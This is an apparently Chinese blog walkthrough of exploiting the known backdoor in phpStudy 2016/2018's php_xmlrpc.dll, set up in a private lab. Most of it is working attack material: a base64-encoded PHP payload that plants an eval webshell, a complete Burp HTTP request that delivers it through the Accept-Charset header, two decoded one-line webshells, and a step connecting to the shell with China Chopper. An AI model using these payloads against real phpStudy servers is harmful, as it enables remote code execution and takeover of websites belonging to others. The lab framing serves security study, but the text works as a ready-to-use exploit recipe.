漏洞简介
关于phpStudy的后门漏洞可参考https://blog.csdn.net/weixin_43886632/article/details/101294081
phpStudy在下列文件中存在后门
phpStudy2016
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
测试环境的搭建
环境
- vmware workstation14
- win7网站(ip 192.168.43.196)
- win10攻击者(ip 192.168.43.253)
- burpsuite
- phpstudy2018
安装phpstudy2018
phpstudy2018 安装包下载地址
http://downza.51speed.top/2019/01/08/phpStudySetup.rar?ssig=8b79b632ea138a93faa59871dd6d36f83784f3da&time_stamp=1580838908&fn=06542359202e44c86b60256ca293f836
安装过程不讲
安装成功
安装成功后访问http://192.168.43.196
image.png
使用notepad++打开 C:\PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll,检索eval,如下图所示,说明存在后门
php_xmlrpc.dll中含有后门.png
后门的利用
通过burpsuite抓包,客户端可以通过HTTP头部的Accept-Charset字段来向后台提交命令
执行命令
写入shellcode
In [15]: def b64encode(a):
...: print(base64.b64encode(a.encode('utf-8')))
In [30]: b64encode(r"""$f =fopen("C:\phpStudy\PHPTutorial\WWW\x.php","w");fwrite($f,"<?php @eval(\$_POST['cmd']); ?>"); fclose($f);""")
b'JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs='
使用burpsuiter repeater模块写入webshell,HTTP头部如下
GET / HTTP/1.1
Host: 192.168.43.196
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Charset: JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs=
Accept-Encoding: gzip,deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 2
两个一句话木马
atob('c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=')
"system('echo ^<?php @eval($_POST[\"shell\"])?^>>PHPTutorial\\WWW\\shell.php');"
atob('JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs=')
"$f =fopen(\"C:\\phpStudy\\PHPTutorial\\WWW\\x.php\",\"w\");fwrite($f,\"<?php @eval(\\$_POST['cmd']); ?>\");fclose($f);"
使用菜刀连接
使用菜刀连接
打开shell
网友评论